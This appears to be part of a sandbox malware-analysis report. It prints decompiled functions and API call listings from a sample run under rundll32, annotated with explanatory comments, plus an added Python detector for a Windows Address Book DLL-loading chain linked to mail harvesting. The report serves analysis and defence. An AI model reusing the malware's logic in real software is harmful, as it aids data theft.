                                                          • Opcode Fuzzy Hash: 67a7dc6d74505c9eaf6c874b214da9191dbfae3f6445b39d2e55573396b6809e
                                                          • Instruction Fuzzy Hash: 7F711E75D1120AEFCF40EFE9CC849ADBBB9FF48344B148569E916A7250D731A981CF60
                                                          Uniqueness

                                                           Uniqueness Score: -1.00%
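The listing above records, inside one sub-function (0627EC00), a RegOpenKeyA on hive handle 80000002 (HKEY_LOCAL_MACHINE) for Software\Microsoft\WAB\DLLPath, followed by LoadLibraryA and GetProcAddress. That registry value is the documented location of the Windows Address Book DLL, and loading it from a dropped module is a pattern commonly associated with mail-data harvesting. The script below is an added example for this page (not Joe Sandbox code) that parses lines in exactly the "APIs" format shown in this report, resolves the hive constant, decodes a DWORD immediate the way the decompiler comment 0x76006f next to lstrcmpW should be read (two UTF-16LE code units), and flags that register-open/load/resolve chain per sub-function. The sample lines are copied from this report; the bullet character, the helper names and the chain name are this example's own assumptions.

```python
"""Parse Joe Sandbox 'APIs' listing lines and flag the WAB DLLPath chain.

Added example for this report page; it is not Joe Sandbox code.  The sample
listing below is copied from this report's APIs entries; the helper names
and the chain definition are this example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied from the APIs listings on this page.
SAMPLE = r"""
• Part of subcall function 0627EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0627EC1B
• Part of subcall function 0627EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627EC69
• Part of subcall function 0627EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0627EC82
• Part of subcall function 0627EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0627ECD3
• GetLastError.KERNEL32(?,?,00000001), ref: 0628987C
• FreeLibrary.KERNEL32(?,?,00000001), ref: 062898E4
• wsprintfA.USER32 ref: 0628C4D9
• SysAllocString.OLEAUT32(036D9290), ref: 036D2782
• lstrcmpW.KERNEL32(00000000,0076006F), ref: 036D2863
"""

# One listing line: optional "Part of subcall function X:" prefix, then
# Api.MODULE(args), ref: ADDR.  Lines without an argument list (wsprintfA)
# are accepted too.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined registry hive handles as they appear as the first RegOpenKey argument.
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                  # address of the call site
    subcall: Optional[int]    # enclosing sub-function, None for the listed function itself


def parse_listing(text: str) -> List[Call]:
    """Turn listing lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


def hive_name(arg: str) -> str:
    """Map a hive handle literal such as '80000002' to its symbolic name."""
    try:
        return HIVES.get(int(arg, 16), arg)
    except ValueError:
        return arg


def wide_immediate(arg: str) -> Optional[str]:
    """Read a DWORD literal as two UTF-16LE code units (e.g. 0076006F -> 'ov').

    Only meaningful where the decompiler shows the value as the start of a
    wide string; returns None when the result is not printable ASCII."""
    text = int(arg, 16).to_bytes(4, "little").decode("utf-16-le").rstrip("\x00")
    return text if text.isascii() and text.isprintable() else None


def find_wab_chain(calls: List[Call]) -> List[dict]:
    """Flag RegOpenKey* on HKLM\\...\\WAB\\DLLPath followed, in the same
    sub-function and at higher addresses, by LoadLibrary* and GetProcAddress."""
    by_fn = {}
    for c in calls:
        by_fn.setdefault(c.subcall, []).append(c)
    hits = []
    for fn, seq in by_fn.items():
        opened = [c for c in seq
                  if c.api.startswith("RegOpenKey") and len(c.args) >= 2
                  and hive_name(c.args[0]) == "HKEY_LOCAL_MACHINE"
                  and c.args[1].lower().endswith(r"\wab\dllpath")]
        if not opened:
            continue
        start = opened[0].ref
        loads = [c for c in seq if c.ref > start and c.api.startswith("LoadLibrary")]
        procs = [c for c in seq if c.ref > start and c.api == "GetProcAddress"]
        if loads and procs:
            hits.append({"function": fn, "key": opened[0].args[1],
                         "sequence": [c.api for c in seq if c.ref >= start]})
    return hits


if __name__ == "__main__":
    for hit in find_wab_chain(parse_listing(SAMPLE)):
        print(f"0x{hit['function']:08X}: {hit['key']} -> {' -> '.join(hit['sequence'])}")
```

Run against the sample it reports the chain in 0x0627EC00 (RegOpenKeyA, LoadLibraryA, GetProcAddress, RegCloseKey). The grouping by sub-function matters: the same four APIs spread across unrelated functions are ordinary DLL plumbing, so the check only fires when they sit together after the WAB key is opened.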

                                                          C-Code - Quality: 46%
                                                          			E036D2732(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                           				_t118 =  *((intOrPtr*)( *__eax + 0x48))(); // virtual call through the vtable of __eax (slot at +0x48); the HRESULT lives in _t118 and every `>= 0` test below is SUCCEEDED()
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x36da348; // 0x228d5a8
                                                          					_t5 = _t103 + 0x36db038; // 0x3050f485
                                                           				_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32); // vtable slot 0 with (this, riid, &out): IUnknown::QueryInterface, riid stored at 0x36db038
                                                          					_t56 = _v8;
                                                           				_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56); // vtable slot 2 (+8) with this only: IUnknown::Release on the object returned via +0x48
                                                          					if(_t118 >= 0) {
                                                           					__imp__#2(0x36d9290); // OLEAUT32 ordinal 2 = SysAllocString (see the APIs list below); the BSTR is returned in _t57 and kept in _v28
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                           						_t118 = 0x8007000e; // E_OUTOFMEMORY: SysAllocString returned NULL
                                                          						} else {
                                                          							_t60 = _v32;
                                                           						_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24); // vtable slot +0xbc on the interface obtained by QueryInterface: takes the BSTR, returns a second object in _v24
                                                           						_t87 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString, called through _t87 below
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                           							_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20); // slot +0x24 writes a count into _v20; the loop below runs _v20 iterations (see the `_v40 < _v20` test)
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                           									_t67 = 3;
                                                           									_v64 = _t67; // two 16-byte structures, first word 3 and the dword at +8 zeroed:
                                                           									_v48 = _t67; // consistent with two VARIANTs initialised to VT_I4 (3), copied
                                                           									_v56 = 0;    // onto the stack by the eight movsd below as by-value arguments
                                                           									_v40 = 0;    // _v40 doubles as the loop index
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                           												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8); // slot +0x2c on _v24, with the 32 bytes copied above as by-value arguments: returns the per-iteration object in _v8
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x36da348; // 0x228d5a8
                                                          												_t28 = _t109 + 0x36db0bc; // 0x3050f1ff
                                                           												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16); // QueryInterface again, riid stored at 0x36db0bc
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                           													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12); // slot +0x34 returns a BSTR in _v12 (released with SysFreeString below)
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x36da348; // 0x228d5a8
                                                          														_t33 = _t79 + 0x36db078; // 0x76006f
                                                           														if(lstrcmpW(_v12, _t33) == 0) { // compare with the UTF-16 string at 0x36db078; the immediate 0x76006f is its first two WCHARs, 'o' 'v'
                                                           															_t83 = _v16;
                                                           															 *((intOrPtr*)( *_t83 + 0x114))(_t83); // slot +0x114 invoked on the object whose name matched
                                                           														}
                                                           														 *_t87(_v12); // SysFreeString(_v12)
                                                          													}
                                                          													_t77 = _v16;
                                                           													 *((intOrPtr*)( *_t77 + 8))(_t77); // Release
                                                          												}
                                                          												_t72 = _v8;
                                                           												 *((intOrPtr*)( *_t72 + 8))(_t72); // Release
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                           								 *((intOrPtr*)( *_t65 + 8))(_t65); // Release
                                                          							}
                                                           							 *_t87(_v28); // SysFreeString(_v28)
                                                          						}
                                                          						_t58 = _v32;
                                                           						 *((intOrPtr*)( *_t58 + 8))(_t58); // Release
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}

                                                          APIs
                                                          • SysAllocString.OLEAUT32(036D9290), ref: 036D2782
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 036D2863
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D287C
                                                          • SysFreeString.OLEAUT32(?), ref: 036D28AB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                           • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 967de5de351f1cc7ae3e58330efc886353fa5fd855e38a54c041f9a6a9c002ef
                                                          • Instruction ID: 1571a88547cb5d3973a9fd08a3402f30b857e489d4be97575e854bed6abae7cb
                                                          • Opcode Fuzzy Hash: 967de5de351f1cc7ae3e58330efc886353fa5fd855e38a54c041f9a6a9c002ef
                                                          • Instruction Fuzzy Hash: FE514B75D00609EFCB00DFA8D898DAEF7BAEF88700B144998E915EB314D7329D45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 036D5BD8
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D5CBD
                                                            • Part of subcall function 036D2732: SysAllocString.OLEAUT32(036D9290), ref: 036D2782
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 036D5D10
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D5D1F
                                                            • Part of subcall function 036D3A62: Sleep.KERNEL32(000001F4), ref: 036D3AAA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                           • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID:
                                                          • API String ID: 3193056040-0
                                                          • Opcode ID: 4d4d0f10f24732c3a861f5778af6591898e351ad4a4f3ed1dc916944044d74d9
                                                          • Instruction ID: 2893bbfc5bc5abffb60e5cb654bea9520e0c8409efdac0ba89f6871922412e4c
                                                          • Opcode Fuzzy Hash: 4d4d0f10f24732c3a861f5778af6591898e351ad4a4f3ed1dc916944044d74d9
                                                          • Instruction Fuzzy Hash: B0515039900609AFDB01DFA8D844A9EB7B6FF89740F15842DEA05DB324DB71ED05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?), ref: 06292E89
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • ResetEvent.KERNEL32(?,?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6), ref: 06292F00
                                                          • GetLastError.KERNEL32(?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?), ref: 06292F2D
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • GetLastError.KERNEL32(?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?), ref: 06292FEF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 3fe59da100de1adf1d1c0449f45f0af74134b220f14406899a1de2917944f9fc
                                                          • Instruction ID: 6ae523fcd26882541205743b8bda489d5321a4edcadaa4609243e312994c4f05
                                                          • Opcode Fuzzy Hash: 3fe59da100de1adf1d1c0449f45f0af74134b220f14406899a1de2917944f9fc
                                                          • Instruction Fuzzy Hash: 31416171A21305FFEB619FA0DC88EAB7BADEF84754B044929FE46D1190E770DA44CA70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E036D1DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v156;
                                                          				void _v428;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E036D2FAB(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E036D1CC1(_t79,  &_v428);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E036D2920(_t101,  &_v428, _a8, _t96 - _t81);
                                                          					E036D2920(_t79,  &_v156, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                          					_t66 = E036D1CC1(_t101, 0x36da1d0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E036D1CC1(_a16, _a4);
                                                          						E036D3ADA(_t79,  &_v428, _a4, _t97);
                                                          						memset( &_v428, 0, 0x10c);
                                                          						_t55 = memset( &_v156, 0, 0x84);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L036D824A();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L036D8244();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                          						_a12 = _t74;
                                                          						_t76 = E036D241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v156;
                                                          							if(E036D2378(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E036D79CC(_t79,  &_v156, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x36da1d0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 036D1E96
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 036D1EAC
                                                          • memset.NTDLL ref: 036D1F55
                                                          • memset.NTDLL ref: 036D1F6B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: a7aee5a434164558dcd229e91b59b21536839f5945d87de0cb72728aa2986921
                                                          • Instruction ID: 85ab054a8b69c73912dcfa177d918af664a28dcc241db9b790944ed66c8be735
                                                          • Opcode Fuzzy Hash: a7aee5a434164558dcd229e91b59b21536839f5945d87de0cb72728aa2986921
                                                          • Instruction Fuzzy Hash: 0941C271E00219AFDF50DF68DC44BEE77B9EF86310F004569F9199B280DBB0AE548B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 06284E5C
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 06284E72
                                                          • memset.NTDLL ref: 06284F1B
                                                          • memset.NTDLL ref: 06284F31
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 0c651e938ab9638abd98d6ec2afef9697dc78a19d1f17f8aa43cfb533b6f0886
                                                          • Instruction ID: bfb983762efb1251e9b3029ff6d3c0130d6fba2d7f23f8bf444407b39b9302b7
                                                          • Opcode Fuzzy Hash: 0c651e938ab9638abd98d6ec2afef9697dc78a19d1f17f8aa43cfb533b6f0886
                                                          • Instruction Fuzzy Hash: 8E418F32A2121AAFDF90FF68CC80BEE77A5EF45310F004569EC29A7280DB709E55CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,00000000,00000000,06273EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628C7D5
                                                          • GetLastError.KERNEL32(?,?,?,06273EC6,?,?), ref: 0628C7EE
                                                          • ResetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628C867
                                                          • GetLastError.KERNEL32(?,?,?,06273EC6,?,?), ref: 0628C882
                                                            • Part of subcall function 0628EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628EC20
                                                            • Part of subcall function 0628EC09: SetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628EC30
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 4c23352eb038047bd0040e7a7a861f7707af436dabfd3687877db76d5fa37d8a
                                                          • Instruction ID: 26a41bd11ded1cb808da0fd9a8a7bd4e2b416e315258b9d12cfeb4be2a677c82
                                                          • Opcode Fuzzy Hash: 4c23352eb038047bd0040e7a7a861f7707af436dabfd3687877db76d5fa37d8a
                                                          • Instruction Fuzzy Hash: 4E411932F61201AFDB92BBA4DC44EAE77B9EF882A0F140525ED12D71D0E770E941DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 06289A93
                                                          • StrChrA.SHLWAPI(?,0000005C), ref: 06289ABA
                                                          • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 06289AE0
                                                          • lstrcpy.KERNEL32(?,?), ref: 06289B84
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpylstrcpyn
                                                          • String ID:
                                                          • API String ID: 4154805583-0
                                                          • Opcode ID: 2e798ee759798dca62c405908fadca9ce26234c3837c55f3738235efc2c5a3ae
                                                          • Instruction ID: 420e22657403b4e12fc4fe814e9ea36fc003b35e8fcd14eb9065df86e2195b98
                                                          • Opcode Fuzzy Hash: 2e798ee759798dca62c405908fadca9ce26234c3837c55f3738235efc2c5a3ae
                                                          • Instruction Fuzzy Hash: 5A415E72D11219BFDB51EBA8DC48DEE7BBDAF49350F0444A6EA01E7180D6349A84CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strupr
                                                          • String ID:
                                                          • API String ID: 3408778250-0
                                                          • Opcode ID: e9eacc197304c8e452cba1bea0bb72b0aa2a0e399630560c1ef84fa0e3f487bb
                                                          • Instruction ID: 5167581206396a01e8ab091e5baad4bdcffd705eb2ce8170d35f2221efecc1b5
                                                          • Opcode Fuzzy Hash: e9eacc197304c8e452cba1bea0bb72b0aa2a0e399630560c1ef84fa0e3f487bb
                                                          • Instruction Fuzzy Hash: A9414131C1120A9EEFA1EF78DC88AFEB7A9EF85250F144819EC25D6164D778D5C4CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 06279D54
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062748C0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 06274911
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 06274946
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 06274956
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                          • String ID:
                                                          • API String ID: 4200334623-0
                                                          • Opcode ID: 7d8898ed784ea855072647b942b4dae3106cb4fdc33f80112379cc2d5ab8e0a1
                                                          • Instruction ID: e32138a005a5c7696f584f88b1bdbee4de0e6fd3051f98d4cccf3f494631971a
                                                          • Opcode Fuzzy Hash: 7d8898ed784ea855072647b942b4dae3106cb4fdc33f80112379cc2d5ab8e0a1
                                                          • Instruction Fuzzy Hash: 64315876A10219FFDB009FA4ED89CAEBBBEEF49250B104065FA05E3110D771AE54DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628EC20
                                                          • SetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628EC30
                                                          • GetLastError.KERNEL32 ref: 0628ECB9
                                                            • Part of subcall function 0628F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,06292F4B,0000EA60,?,?,?,0628DD27,00000000,0000EA60,00000000), ref: 0628F1B2
